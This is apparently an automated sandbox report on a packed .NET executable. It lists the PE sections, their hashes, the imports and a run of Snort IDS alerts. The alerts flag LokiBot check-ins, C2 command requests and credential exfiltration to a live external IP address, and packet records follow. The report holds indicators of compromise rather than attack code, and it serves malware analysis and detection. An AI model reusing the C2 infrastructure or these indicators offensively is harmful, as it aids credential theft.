Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x81074	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x82000	0xf50	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x80600	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x84000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7f0cc	0x7f200	0d4bfbb7fc18f7274db8d0d3c360696e	False	0.9626544063421829	data	7.9734414761650525	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x82000	0xf50	0x1000	eb7f485a41acc29530103a74dee81375	False	0.69140625	data	6.5012090734218955	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x84000	0xc	0x200	df66051bd0a5bd7cdac87814fafb4ca4	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x820c8	0xb84	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.8253052917232022
RT_GROUP_ICON	0x82c5c	0x14	data	1.05
RT_VERSION	0x82c80	0x2cc	data	0.4301675977653631

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/22/24-22:01:50.434635	TCP	2025381	ET TROJAN LokiBot Checkin	49709	80	192.168.2.7	45.61.137.215
05/22/24-22:02:00.654651	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49717	80	192.168.2.7	45.61.137.215
05/22/24-22:02:00.654651	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49717	80	192.168.2.7	45.61.137.215
05/22/24-22:02:20.207962	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49723	80	192.168.2.7	45.61.137.215
05/22/24-22:01:47.110312	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49708	80	192.168.2.7	45.61.137.215
05/22/24-22:02:10.745956	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49720	80	192.168.2.7	45.61.137.215
05/22/24-22:02:14.011875	TCP	2025381	ET TROJAN LokiBot Checkin	49721	80	192.168.2.7	45.61.137.215
05/22/24-22:02:10.745956	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49720	80	192.168.2.7	45.61.137.215
05/22/24-22:03:15.260799	TCP	2025381	ET TROJAN LokiBot Checkin	49740	80	192.168.2.7	45.61.137.215
05/22/24-22:02:39.745782	TCP	2025381	ET TROJAN LokiBot Checkin	49730	80	192.168.2.7	45.61.137.215
05/22/24-22:03:32.900181	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49745	80	192.168.2.7	45.61.137.215
05/22/24-22:02:03.530501	TCP	2025381	ET TROJAN LokiBot Checkin	49718	80	192.168.2.7	45.61.137.215
05/22/24-22:03:42.997268	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49748	80	192.168.2.7	45.61.137.215
05/22/24-22:03:32.900181	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49745	80	192.168.2.7	45.61.137.215
05/22/24-22:03:00.355563	TCP	2025381	ET TROJAN LokiBot Checkin	49736	80	192.168.2.7	45.61.137.215
05/22/24-22:02:33.749822	TCP	2025381	ET TROJAN LokiBot Checkin	49727	80	192.168.2.7	45.61.137.215
05/22/24-22:03:11.339177	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49739	80	192.168.2.7	45.61.137.215
05/22/24-22:03:00.355563	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49736	80	192.168.2.7	45.61.137.215
05/22/24-22:02:39.745782	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49730	80	192.168.2.7	45.61.137.215
05/22/24-22:02:06.757643	TCP	2025381	ET TROJAN LokiBot Checkin	49719	80	192.168.2.7	45.61.137.215
05/22/24-22:02:39.745782	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49730	80	192.168.2.7	45.61.137.215
05/22/24-22:03:22.325206	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49742	80	192.168.2.7	45.61.137.215
05/22/24-22:02:03.530501	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49718	80	192.168.2.7	45.61.137.215
05/22/24-22:02:43.048990	TCP	2025381	ET TROJAN LokiBot Checkin	49731	80	192.168.2.7	45.61.137.215
05/22/24-22:03:00.355563	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49736	80	192.168.2.7	45.61.137.215
05/22/24-22:02:24.001326	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49724	80	192.168.2.7	45.61.137.215
05/22/24-22:02:56.560139	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49735	80	192.168.2.7	45.61.137.215
05/22/24-22:03:39.786935	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49747	80	192.168.2.7	45.61.137.215
05/22/24-22:03:03.962389	TCP	2025381	ET TROJAN LokiBot Checkin	49737	80	192.168.2.7	45.61.137.215
05/22/24-22:02:10.745956	TCP	2025381	ET TROJAN LokiBot Checkin	49720	80	192.168.2.7	45.61.137.215
05/22/24-22:02:36.928242	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49729	80	192.168.2.7	45.61.137.215
05/22/24-22:01:47.110312	TCP	2025381	ET TROJAN LokiBot Checkin	49708	80	192.168.2.7	45.61.137.215
05/22/24-22:03:18.886669	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49741	80	192.168.2.7	45.61.137.215
05/22/24-22:02:56.560139	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49735	80	192.168.2.7	45.61.137.215
05/22/24-22:03:15.260799	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49740	80	192.168.2.7	45.61.137.215
05/22/24-22:03:25.799709	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49743	80	192.168.2.7	45.61.137.215
05/22/24-22:03:36.285874	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49746	80	192.168.2.7	45.61.137.215
05/22/24-22:02:46.431591	TCP	2025381	ET TROJAN LokiBot Checkin	49732	80	192.168.2.7	45.61.137.215
05/22/24-22:03:15.260799	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49740	80	192.168.2.7	45.61.137.215
05/22/24-22:02:30.532619	TCP	2025381	ET TROJAN LokiBot Checkin	49726	80	192.168.2.7	45.61.137.215
05/22/24-22:03:03.962389	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49737	80	192.168.2.7	45.61.137.215
05/22/24-22:03:25.799709	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49743	80	192.168.2.7	45.61.137.215
05/22/24-22:03:39.786935	TCP	2025381	ET TROJAN LokiBot Checkin	49747	80	192.168.2.7	45.61.137.215
05/22/24-22:01:50.434635	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49709	80	192.168.2.7	45.61.137.215
05/22/24-22:03:03.962389	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49737	80	192.168.2.7	45.61.137.215
05/22/24-22:02:17.236236	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49722	80	192.168.2.7	45.61.137.215
05/22/24-22:02:27.150658	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49725	80	192.168.2.7	45.61.137.215
05/22/24-22:02:03.530501	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49718	80	192.168.2.7	45.61.137.215
05/22/24-22:02:52.721787	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49734	80	192.168.2.7	45.61.137.215
05/22/24-22:02:43.048990	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49731	80	192.168.2.7	45.61.137.215
05/22/24-22:02:52.721787	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49734	80	192.168.2.7	45.61.137.215
05/22/24-22:01:39.996238	TCP	2025381	ET TROJAN LokiBot Checkin	49704	80	192.168.2.7	45.61.137.215
05/22/24-22:01:57.173481	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49716	80	192.168.2.7	45.61.137.215
05/22/24-22:01:43.233365	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49707	80	192.168.2.7	45.61.137.215
05/22/24-22:01:53.733914	TCP	2025381	ET TROJAN LokiBot Checkin	49710	80	192.168.2.7	45.61.137.215
05/22/24-22:03:11.339177	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49739	80	192.168.2.7	45.61.137.215
05/22/24-22:01:43.233365	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49707	80	192.168.2.7	45.61.137.215
05/22/24-22:02:49.622449	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49733	80	192.168.2.7	45.61.137.215
05/22/24-22:01:39.996238	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49704	80	192.168.2.7	45.61.137.215
05/22/24-22:02:14.011875	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49721	80	192.168.2.7	45.61.137.215
05/22/24-22:01:39.996238	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49704	80	192.168.2.7	45.61.137.215
05/22/24-22:03:32.900181	TCP	2025381	ET TROJAN LokiBot Checkin	49745	80	192.168.2.7	45.61.137.215
05/22/24-22:02:33.749822	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49727	80	192.168.2.7	45.61.137.215
05/22/24-22:03:11.339177	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49739	80	192.168.2.7	45.61.137.215
05/22/24-22:01:53.733914	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49710	80	192.168.2.7	45.61.137.215
05/22/24-22:02:14.011875	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49721	80	192.168.2.7	45.61.137.215
05/22/24-22:02:06.757643	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49719	80	192.168.2.7	45.61.137.215
05/22/24-22:02:52.721787	TCP	2025381	ET TROJAN LokiBot Checkin	49734	80	192.168.2.7	45.61.137.215
05/22/24-22:01:53.733914	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49710	80	192.168.2.7	45.61.137.215
05/22/24-22:02:46.431591	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49732	80	192.168.2.7	45.61.137.215
05/22/24-22:02:00.654651	TCP	2025381	ET TROJAN LokiBot Checkin	49717	80	192.168.2.7	45.61.137.215
05/22/24-22:01:50.434635	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49709	80	192.168.2.7	45.61.137.215
05/22/24-22:03:29.494079	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49744	80	192.168.2.7	45.61.137.215
05/22/24-22:03:07.384774	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49738	80	192.168.2.7	45.61.137.215
05/22/24-22:01:47.110312	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49708	80	192.168.2.7	45.61.137.215
05/22/24-22:02:20.207962	TCP	2025381	ET TROJAN LokiBot Checkin	49723	80	192.168.2.7	45.61.137.215
05/22/24-22:02:30.532619	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49726	80	192.168.2.7	45.61.137.215
05/22/24-22:02:46.431591	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49732	80	192.168.2.7	45.61.137.215
05/22/24-22:02:30.532619	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49726	80	192.168.2.7	45.61.137.215
05/22/24-22:02:00.654651	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49717	80	192.168.2.7	45.61.137.215
05/22/24-22:02:36.928242	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49729	80	192.168.2.7	45.61.137.215
05/22/24-22:02:20.207962	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49723	80	192.168.2.7	45.61.137.215
05/22/24-22:02:20.207962	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49723	80	192.168.2.7	45.61.137.215
05/22/24-22:02:10.745956	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49720	80	192.168.2.7	45.61.137.215
05/22/24-22:02:24.001326	TCP	2025381	ET TROJAN LokiBot Checkin	49724	80	192.168.2.7	45.61.137.215
05/22/24-22:03:11.339177	TCP	2025381	ET TROJAN LokiBot Checkin	49739	80	192.168.2.7	45.61.137.215
05/22/24-22:03:42.997268	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49748	80	192.168.2.7	45.61.137.215
05/22/24-22:02:49.622449	TCP	2025381	ET TROJAN LokiBot Checkin	49733	80	192.168.2.7	45.61.137.215
05/22/24-22:03:32.900181	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49745	80	192.168.2.7	45.61.137.215
05/22/24-22:03:42.997268	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49748	80	192.168.2.7	45.61.137.215
05/22/24-22:03:22.325206	TCP	2025381	ET TROJAN LokiBot Checkin	49742	80	192.168.2.7	45.61.137.215
05/22/24-22:02:39.745782	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49730	80	192.168.2.7	45.61.137.215
05/22/24-22:03:42.997268	TCP	2025381	ET TROJAN LokiBot Checkin	49748	80	192.168.2.7	45.61.137.215
05/22/24-22:02:24.001326	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49724	80	192.168.2.7	45.61.137.215
05/22/24-22:03:00.355563	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49736	80	192.168.2.7	45.61.137.215
05/22/24-22:02:24.001326	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49724	80	192.168.2.7	45.61.137.215
05/22/24-22:01:43.233365	TCP	2025381	ET TROJAN LokiBot Checkin	49707	80	192.168.2.7	45.61.137.215
05/22/24-22:03:22.325206	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49742	80	192.168.2.7	45.61.137.215
05/22/24-22:02:03.530501	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49718	80	192.168.2.7	45.61.137.215
05/22/24-22:02:27.150658	TCP	2025381	ET TROJAN LokiBot Checkin	49725	80	192.168.2.7	45.61.137.215
05/22/24-22:03:22.325206	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49742	80	192.168.2.7	45.61.137.215
05/22/24-22:03:18.886669	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49741	80	192.168.2.7	45.61.137.215
05/22/24-22:03:25.799709	TCP	2025381	ET TROJAN LokiBot Checkin	49743	80	192.168.2.7	45.61.137.215
05/22/24-22:03:39.786935	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49747	80	192.168.2.7	45.61.137.215
05/22/24-22:03:18.886669	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49741	80	192.168.2.7	45.61.137.215
05/22/24-22:03:39.786935	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49747	80	192.168.2.7	45.61.137.215
05/22/24-22:02:56.560139	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49735	80	192.168.2.7	45.61.137.215
05/22/24-22:02:36.928242	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49729	80	192.168.2.7	45.61.137.215
05/22/24-22:02:56.560139	TCP	2025381	ET TROJAN LokiBot Checkin	49735	80	192.168.2.7	45.61.137.215
05/22/24-22:03:07.384774	TCP	2025381	ET TROJAN LokiBot Checkin	49738	80	192.168.2.7	45.61.137.215
05/22/24-22:03:36.285874	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49746	80	192.168.2.7	45.61.137.215
05/22/24-22:03:25.799709	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49743	80	192.168.2.7	45.61.137.215
05/22/24-22:03:15.260799	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49740	80	192.168.2.7	45.61.137.215
05/22/24-22:03:18.886669	TCP	2025381	ET TROJAN LokiBot Checkin	49741	80	192.168.2.7	45.61.137.215
05/22/24-22:03:03.962389	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49737	80	192.168.2.7	45.61.137.215
05/22/24-22:02:52.721787	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49734	80	192.168.2.7	45.61.137.215
05/22/24-22:03:29.494079	TCP	2025381	ET TROJAN LokiBot Checkin	49744	80	192.168.2.7	45.61.137.215
05/22/24-22:03:36.285874	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49746	80	192.168.2.7	45.61.137.215
05/22/24-22:01:50.434635	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49709	80	192.168.2.7	45.61.137.215
05/22/24-22:02:36.928242	TCP	2025381	ET TROJAN LokiBot Checkin	49729	80	192.168.2.7	45.61.137.215
05/22/24-22:02:17.236236	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49722	80	192.168.2.7	45.61.137.215
05/22/24-22:02:06.757643	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49719	80	192.168.2.7	45.61.137.215
05/22/24-22:02:27.150658	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49725	80	192.168.2.7	45.61.137.215
05/22/24-22:02:43.048990	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49731	80	192.168.2.7	45.61.137.215
05/22/24-22:01:57.173481	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49716	80	192.168.2.7	45.61.137.215
05/22/24-22:01:57.173481	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49716	80	192.168.2.7	45.61.137.215
05/22/24-22:02:43.048990	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49731	80	192.168.2.7	45.61.137.215
05/22/24-22:01:43.233365	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49707	80	192.168.2.7	45.61.137.215
05/22/24-22:02:27.150658	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49725	80	192.168.2.7	45.61.137.215
05/22/24-22:02:17.236236	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49722	80	192.168.2.7	45.61.137.215
05/22/24-22:02:49.622449	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49733	80	192.168.2.7	45.61.137.215
05/22/24-22:01:39.996238	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49704	80	192.168.2.7	45.61.137.215
05/22/24-22:02:17.236236	TCP	2025381	ET TROJAN LokiBot Checkin	49722	80	192.168.2.7	45.61.137.215
05/22/24-22:02:14.011875	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49721	80	192.168.2.7	45.61.137.215
05/22/24-22:01:53.733914	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49710	80	192.168.2.7	45.61.137.215
05/22/24-22:02:06.757643	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49719	80	192.168.2.7	45.61.137.215
05/22/24-22:02:33.749822	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49727	80	192.168.2.7	45.61.137.215
05/22/24-22:02:49.622449	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49733	80	192.168.2.7	45.61.137.215
05/22/24-22:01:57.173481	TCP	2025381	ET TROJAN LokiBot Checkin	49716	80	192.168.2.7	45.61.137.215
05/22/24-22:02:33.749822	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49727	80	192.168.2.7	45.61.137.215
05/22/24-22:03:07.384774	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49738	80	192.168.2.7	45.61.137.215
05/22/24-22:03:36.285874	TCP	2025381	ET TROJAN LokiBot Checkin	49746	80	192.168.2.7	45.61.137.215
05/22/24-22:03:29.494079	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49744	80	192.168.2.7	45.61.137.215
05/22/24-22:02:46.431591	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49732	80	192.168.2.7	45.61.137.215
05/22/24-22:01:47.110312	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49708	80	192.168.2.7	45.61.137.215
05/22/24-22:03:07.384774	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49738	80	192.168.2.7	45.61.137.215
05/22/24-22:02:30.532619	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49726	80	192.168.2.7	45.61.137.215
05/22/24-22:03:29.494079	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49744	80	192.168.2.7	45.61.137.215

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 22, 2024 22:01:39.988970995 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:39.994077921 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:39.994157076 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:39.996237993 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:40.048659086 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:40.048728943 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:40.053695917 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:42.994126081 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:42.996242046 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:42.996753931 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:42.996753931 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:43.001065969 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:43.005872965 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:43.005886078 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:43.005896091 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:43.005906105 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:43.005938053 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:43.005938053 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:43.015408039 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:43.019284964 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:43.019305944 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:43.019315004 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:43.019350052 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:43.019367933 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:43.019367933 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:43.021476984 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:43.025376081 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:43.025388956 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:43.029516935 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:43.031445026 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:43.031456947 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:43.031465054 CEST	80	49704	45.61.137.215	192.168.2.7
May 22, 2024 22:01:43.031546116 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:43.031546116 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:43.031546116 CEST	49704	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:43.225668907 CEST	49707	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:43.230861902 CEST	80	49707	45.61.137.215	192.168.2.7
May 22, 2024 22:01:43.230952978 CEST	49707	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:43.233365059 CEST	49707	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:43.283905029 CEST	80	49707	45.61.137.215	192.168.2.7
May 22, 2024 22:01:43.284064054 CEST	49707	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:43.288939953 CEST	80	49707	45.61.137.215	192.168.2.7
May 22, 2024 22:01:47.036700964 CEST	80	49707	45.61.137.215	192.168.2.7
May 22, 2024 22:01:47.038836002 CEST	80	49707	45.61.137.215	192.168.2.7
May 22, 2024 22:01:47.039061069 CEST	49707	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:47.043613911 CEST	80	49707	45.61.137.215	192.168.2.7
May 22, 2024 22:01:47.045375109 CEST	49707	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:47.048432112 CEST	80	49707	45.61.137.215	192.168.2.7
May 22, 2024 22:01:47.048445940 CEST	80	49707	45.61.137.215	192.168.2.7
May 22, 2024 22:01:47.048456907 CEST	80	49707	45.61.137.215	192.168.2.7
May 22, 2024 22:01:47.048532963 CEST	49707	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:47.048532963 CEST	49707	80	192.168.2.7	45.61.137.215
May 22, 2024 22:01:47.057940006 CEST	80	49707	45.61.137.215	192.168.2.7
